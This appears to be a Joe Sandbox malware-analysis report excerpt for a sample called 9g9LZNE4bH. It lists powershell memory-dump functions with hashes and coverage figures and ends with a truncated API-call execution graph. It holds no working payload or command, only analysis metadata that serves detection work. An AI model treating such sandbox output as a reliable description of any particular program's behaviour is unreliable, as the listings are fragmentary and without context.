                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                        • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                        • Opcode ID: 66c8300b4af59c15dcd97ce3226c8c86c40103537a2148157172d17d4dc686d1
                                                                                                                                                                                                                                        • Instruction ID: 4e1f58f5d8c545570e3f13a82bfd64df253f54345614e793646c03fb702d81ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66c8300b4af59c15dcd97ce3226c8c86c40103537a2148157172d17d4dc686d1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A001DBE2B1998552EF60DF39F841165A7E0E7CC7C4B449031EB5DCBB69EE2CD1418700

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF8475FA816 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: iQ_L
                                                                                                                                                                                                                                        • API String ID: 0-1214082866
                                                                                                                                                                                                                                        • Opcode ID: 7739aaab930eebd62609a6123f4683762a4cad7ea66dda0b7b8a088de7841c7f
                                                                                                                                                                                                                                        • Instruction ID: 05e020269109e13696767fa8e862d6435930a826f1dc1fdce0d31bc771746c87
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7739aaab930eebd62609a6123f4683762a4cad7ea66dda0b7b8a088de7841c7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E91493190DBC28FE316EB288C9956D7BE0EF53254B1906BAC4E9CB153FE156807C752
                                                                                                                                                                                                                                        Function 00007FF8475FA83C Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: iQ_L
                                                                                                                                                                                                                                        • API String ID: 0-1214082866
                                                                                                                                                                                                                                        • Opcode ID: 7e58f51ff6a7d38f624b5aad39845650e3183cc6532a89533a5a496f8f229593
                                                                                                                                                                                                                                        • Instruction ID: 615f43211c65f8d7e79ced2a48a1058fbc32f2a76a83b76839195d69695775f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e58f51ff6a7d38f624b5aad39845650e3183cc6532a89533a5a496f8f229593
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF41593060CB898FE359EA2CC84597577E0EF5A354B1405BED48AC7293E916FC43C742
                                                                                                                                                                                                                                        Function 00007FF8475F3428 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: /Q^
                                                                                                                                                                                                                                        • API String ID: 0-497705585
                                                                                                                                                                                                                                        • Opcode ID: f61872b938807a974fdb13fa97ad1563c6e4772364217ffa508de68a76043ff7
                                                                                                                                                                                                                                        • Instruction ID: b8bca72d073dc66ba1853a58804fe5948331447c9598a8a1381b63b8031f0c4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f61872b938807a974fdb13fa97ad1563c6e4772364217ffa508de68a76043ff7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10217E76D0D3C28FF3575A786C6A0A93FA0EF5366074A02FBC4958B0A3D41A184BC755
                                                                                                                                                                                                                                        Function 00007FF8476C67F5 Relevance: .4, Instructions: 431COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3d88b84cbaff0810501a831bd75143f49551401a66ff7d3b6042c05f9ab5b61e
                                                                                                                                                                                                                                        • Instruction ID: ee23894a7e91fa0fcbc1ab072646704261e295cfc7f2bbbcf3a464f0c2bcba1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d88b84cbaff0810501a831bd75143f49551401a66ff7d3b6042c05f9ab5b61e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6D15731E1EB8A9FEB95AB6858185B97BE2FF06790B0801FED00DC70D3DA19AC05C355
                                                                                                                                                                                                                                        Function 00007FF8474DE380 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2230475030.00007FF8474DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474DD000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8474dd000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b9d3558893a0d945dd131e3ed1f3eddebf5dfeba19fcda3f7849754753d9c0f1
                                                                                                                                                                                                                                        • Instruction ID: 5ebcdd7a440556be85992254c595bfc7f0796bb66598df01c28f047de530de97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9d3558893a0d945dd131e3ed1f3eddebf5dfeba19fcda3f7849754753d9c0f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41157180DBC48FE7569B3998459A23FF0EF53364B1506EFD0C8CB1A3D625A846C792
                                                                                                                                                                                                                                        Function 00007FF8475F9880 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4ceaacea401a5576e4c36ed608e25b77a2e3138bf6fa5268152a354a879e2608
                                                                                                                                                                                                                                        • Instruction ID: 578aab17174b661b560042c6b25a13ed1804003f0f7b54074b237de0b4c60688
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ceaacea401a5576e4c36ed608e25b77a2e3138bf6fa5268152a354a879e2608
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C131B57191CB888FDB189B5C9C066E97BF0FB99711F00426FE449D3252DA71A855CBC2
                                                                                                                                                                                                                                        Function 00007FF8475FBD7D Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5d16d3998c66611d13640c0d10400d9e54de1fdac20053561a36e3a784d50a80
                                                                                                                                                                                                                                        • Instruction ID: 6850caa5ff1c4bb563ef2a90ee1aa81908db62b41d4b5b4fe125f135c82f35eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d16d3998c66611d13640c0d10400d9e54de1fdac20053561a36e3a784d50a80
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E31C57161CB888FDB49DB6CDC497E97BF0EF66324F0441ABD058C7152DA24A41ACB92
                                                                                                                                                                                                                                        Function 00007FF8475F33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction ID: c6043eeaaf01bdc5c371b24dd5f80e8f47315a491e1f9b889fede4f0cb959390
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0401677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                                                                                        Function 00007FF8475FA1FB Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 932fe25a96255ac537f174e8de1c100fb8bec4956a5cdf622dd61897872460a9
                                                                                                                                                                                                                                        • Instruction ID: bfb048362f37a51bf29b73eebdddb96a17db9225f90f1ef0644a294e1cef0422
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 932fe25a96255ac537f174e8de1c100fb8bec4956a5cdf622dd61897872460a9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FF0C272908A8C8FCB55EF28DC592E93FE0FF66245F0502ABD859CB051E7724518C7C2
                                                                                                                                                                                                                                        Function 00007FF8476C432D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8d39a95b2e34a6e4f07252022446041415df977e840567098c17fdcb38e0141f
                                                                                                                                                                                                                                        • Instruction ID: 83b3bb4469e653f8313071aee81f3d1bccfcaf267d64ca126fc30084794802f7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d39a95b2e34a6e4f07252022446041415df977e840567098c17fdcb38e0141f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0BE32E0D6098FDA68EA1CE8008E87BE1FF8536071100BAE05DC70ABDA26EC41C780
                                                                                                                                                                                                                                        Function 00007FF8476C45E0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2234054761.00007FF8476C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8476c0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 261b4e67829f359148dbbc97ae8ed626c1c86f97f89529bd7e94da1e6d0b43b9
                                                                                                                                                                                                                                        • Instruction ID: a81b69108b1fc882975fdaf839ddf328f3f03a11c937fcc104e5eebe69a3ff77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 261b4e67829f359148dbbc97ae8ed626c1c86f97f89529bd7e94da1e6d0b43b9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF05E31A0D5498FDA55EA1CE4418E87BE0EF4536071500B6E559CB16BDA26EC448790

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00007FF8475F8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                                                                                        • API String ID: 0-1031638419
                                                                                                                                                                                                                                        • Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                                                                                                                                                                        • Instruction ID: d3352af175113f7de40d2d32539e35b0de4342478a49ec8c9811cb0008082b10
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21F1777085166FD3027AEDB8025EC7390DBD46B634991B3D358CB553EA14B08B8AD4
                                                                                                                                                                                                                                        Function 00007FF8475F8955 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000007.00000002.2232217359.00007FF8475F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff8475f0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                        • API String ID: 0-2357752022
                                                                                                                                                                                                                                        • Opcode ID: 27f3c56b122c4cd1435788e770f1e405fb2db1ffd8bc27715e115a564efeaab1
                                                                                                                                                                                                                                        • Instruction ID: ca1c8cb59265e2d13b1cb74583e032193bac0c3e0def28c7e031fb64680ba781
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27f3c56b122c4cd1435788e770f1e405fb2db1ffd8bc27715e115a564efeaab1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF515372A0EAC38FE35656394C66159BFA0FF52398B1A42F6C0D48F093FF5928568712

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF8476A17D9 Relevance: .8, Instructions: 780COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000002A.00000002.2302403362.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_42_2_7ff8476a0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 78e9b5c300f527b8e36eaa1398be40fe5a9229604fda86dee356184a7617763a
                                                                                                                                                                                                                                        • Instruction ID: 6b2a83413b68d383b4ce460c274d7701f4bd9e1b14465296412eff90fda86b30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78e9b5c300f527b8e36eaa1398be40fe5a9229604fda86dee356184a7617763a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D223821E0DB899FEB9AA73868556BA7BF2EF47650F0801FBD04DC7193E9189C06C741
                                                                                                                                                                                                                                        Function 00007FF8475D4DD3 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000002A.00000002.2301837901.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_42_2_7ff8475d0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c5fecd3ed9da3d3592d55487b7f70f055f1d0385f2586270ceadcafa6d0a8c1d
                                                                                                                                                                                                                                        • Instruction ID: 3e0fa9093f8a7930af8d92681a4716fdd6263c20ca0094d50df6308ee2a590c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5fecd3ed9da3d3592d55487b7f70f055f1d0385f2586270ceadcafa6d0a8c1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4561F471E0DA498FD745EB6CD8556ADBBF1EF4A310F1480BED449DB292DB35A802CB80
                                                                                                                                                                                                                                        Function 00007FF8475D3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000002A.00000002.2301837901.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_42_2_7ff8475d0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                        • Instruction ID: ec7303ac25b6f2ba240a62a78cda6aba8bd6885d5843fd76fa0bf63e93a1e51e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D636E882CB45

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:7.9%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0.5%
                                                                                                                                                                                                                                        Total number of Nodes:1213
                                                                                                                                                                                                                                        Total number of Limit Nodes:32
                                                                                                                                                                                                                                        execution_graph 38255 7ff6aa1e9c74 38256 7ff6aa1e9c7c 38255->38256 38257 7ff6aa1e9cbb 38256->38257 38259 7ff6aa1e9cac 38256->38259 38258 7ff6aa1e9cc5 38257->38258 38277 7ff6aa1ece08 32 API calls 2 library calls 38257->38277 38264 7ff6aa1e4b8c 38258->38264 38276 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 38259->38276 38263 7ff6aa1e9cb1 __scrt_fastfail 38265 7ff6aa1e4ba1 38264->38265 38266 7ff6aa1e4bab 38264->38266 38278 7ff6aa1e4ab4 38265->38278 38268 7ff6aa1e4bb0 38266->38268 38274 7ff6aa1e4bb7 __vcrt_getptd_noexit 38266->38274 38285 7ff6aa1e4a74 38268->38285 38269 7ff6aa1e4bf6 38294 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 38269->38294 38271 7ff6aa1e4be0 RtlReAllocateHeap 38273 7ff6aa1e4ba9 38271->38273 38271->38274 38273->38263 38274->38269 38274->38271 38291 7ff6aa1e36c0 38274->38291 38276->38263 38277->38258 38279 7ff6aa1e4aff 38278->38279 38284 7ff6aa1e4ac3 __vcrt_getptd_noexit 38278->38284 38295 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 38279->38295 38281 7ff6aa1e4ae6 RtlAllocateHeap 38282 7ff6aa1e4afd 38281->38282 38281->38284 38282->38273 38283 7ff6aa1e36c0 new 2 API calls 38283->38284 38284->38279 38284->38281 38284->38283 38286 7ff6aa1e4aa9 Concurrency::details::SchedulerProxy::DeleteThis 38285->38286 38287 7ff6aa1e4a79 RtlFreeHeap 38285->38287 38286->38273 38287->38286 38288 7ff6aa1e4a94 38287->38288 38296 7ff6aa1e4f3c 15 API calls _set_errno_from_matherr 38288->38296 38290 7ff6aa1e4a99 GetLastError 38290->38286 38297 7ff6aa1e3700 38291->38297 38294->38273 38295->38282 38296->38290 38302 7ff6aa1e6938 EnterCriticalSection 38297->38302 38299 7ff6aa1e370d 38300 7ff6aa1e6998 fflush LeaveCriticalSection 38299->38300 38301 7ff6aa1e36d2 38300->38301 38301->38274 38303 7ff6aa187a5b 38304 7ff6aa187a60 38303->38304 38306 7ff6aa187af7 38304->38306 38336 7ff6aa199be0 38304->38336 38307 7ff6aa187bda 38306->38307 38439 7ff6aa1a1e1c GetFileTime 38306->38439 38347 7ff6aa18b540 38307->38347 38312 7ff6aa18b540 147 API calls 38315 7ff6aa187c9c 38312->38315 38313 7ff6aa187c3e 38313->38312 38314 7ff6aa187f89 38315->38314 38441 7ff6aa1a6378 38315->38441 38317 7ff6aa187cd7 38318 7ff6aa1a6378 4 API calls 38317->38318 38320 7ff6aa187cf3 38318->38320 38319 7ff6aa187de1 38326 7ff6aa187e4e 38319->38326 38452 7ff6aa1b98dc 38319->38452 38320->38319 38322 7ff6aa187d59 38320->38322 38323 7ff6aa187d38 38320->38323 38324 7ff6aa1da444 new 4 API calls 38322->38324 38445 7ff6aa1da444 38323->38445 38330 7ff6aa187d42 std::bad_alloc::bad_alloc 38324->38330 38458 7ff6aa181204 48 API calls 38326->38458 38328 7ff6aa187eb3 38331 7ff6aa187edb 38328->38331 38459 7ff6aa1b9680 38328->38459 38330->38319 38451 7ff6aa1dba34 RtlPcToFileHeader RaiseException 38330->38451 38465 7ff6aa1a6424 8 API calls _UnwindNestedFrames 38331->38465 38334 7ff6aa187f56 38335 7ff6aa18b540 147 API calls 38334->38335 38335->38314 38466 7ff6aa19901c CryptAcquireContextW 38336->38466 38340 7ff6aa199c2a 38476 7ff6aa1c9ce4 38340->38476 38344 7ff6aa199c5b memcpy_s 38486 7ff6aa1da610 38344->38486 38351 7ff6aa18b55f setbuf 38347->38351 38348 7ff6aa18b5a1 38349 7ff6aa18b5d8 38348->38349 38350 7ff6aa18b5b8 38348->38350 38625 7ff6aa1b8c1c 38349->38625 38511 7ff6aa18aba0 38350->38511 38351->38348 38507 7ff6aa18a4d0 38351->38507 38354 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38355 7ff6aa187bf8 38354->38355 38355->38313 38440 7ff6aa1d9b98 216 API calls 3 library calls 38355->38440 38356 7ff6aa18b67f 38357 7ff6aa18bc91 38356->38357 38358 7ff6aa18bbae 38356->38358 38359 7ff6aa18b6a5 38356->38359 38361 7ff6aa1a2574 126 API calls 38357->38361 38437 7ff6aa18b5d3 38357->38437 38362 7ff6aa1b8d00 48 API calls 38358->38362 38372 7ff6aa18b6b5 38359->38372 38388 7ff6aa18b79f 38359->38388 38359->38437 38361->38437 38364 7ff6aa18bc5c 38362->38364 38694 7ff6aa1b8d38 48 API calls 38364->38694 38368 7ff6aa18bc69 38695 7ff6aa1b8d38 48 API calls 38368->38695 38370 7ff6aa18bc76 38696 7ff6aa1b8d38 48 API calls 38370->38696 38372->38437 38659 7ff6aa1b8d00 38372->38659 38373 7ff6aa18bc84 38697 7ff6aa1b8d88 48 API calls 38373->38697 38378 7ff6aa18b726 38663 7ff6aa1b8d38 48 API calls 38378->38663 38380 7ff6aa18b733 38381 7ff6aa18b749 38380->38381 38664 7ff6aa1b8d88 48 API calls 38380->38664 38383 7ff6aa18b75c 38381->38383 38665 7ff6aa1b8d38 48 API calls 38381->38665 38384 7ff6aa18b779 38383->38384 38387 7ff6aa1b8d00 48 API calls 38383->38387 38666 7ff6aa1b8f94 38384->38666 38387->38383 38389 7ff6aa18b8e5 38388->38389 38676 7ff6aa18c3c8 CharLowerW CharUpperW 38388->38676 38677 7ff6aa1cd840 WideCharToMultiByte 38389->38677 38393 7ff6aa18b9a1 38395 7ff6aa1b8d00 48 API calls 38393->38395 38397 7ff6aa18b9c4 38395->38397 38396 7ff6aa18b910 38396->38393 38679 7ff6aa18945c 55 API calls _UnwindNestedFrames 38396->38679 38680 7ff6aa1b8d38 48 API calls 38397->38680 38399 7ff6aa18b9d1 38681 7ff6aa1b8d38 48 API calls 38399->38681 38401 7ff6aa18b9de 38682 7ff6aa1b8d88 48 API calls 38401->38682 38403 7ff6aa18b9eb 38683 7ff6aa1b8d88 48 API calls 38403->38683 38405 7ff6aa18ba0b 38406 7ff6aa1b8d00 48 API calls 38405->38406 38407 7ff6aa18ba27 38406->38407 38684 7ff6aa1b8d88 48 API calls 38407->38684 38409 7ff6aa18ba37 38410 7ff6aa18ba49 38409->38410 38685 7ff6aa1cbc48 15 API calls 38409->38685 38686 7ff6aa1b8d88 48 API calls 38410->38686 38413 7ff6aa18ba59 38414 7ff6aa1b8d00 48 API calls 38413->38414 38415 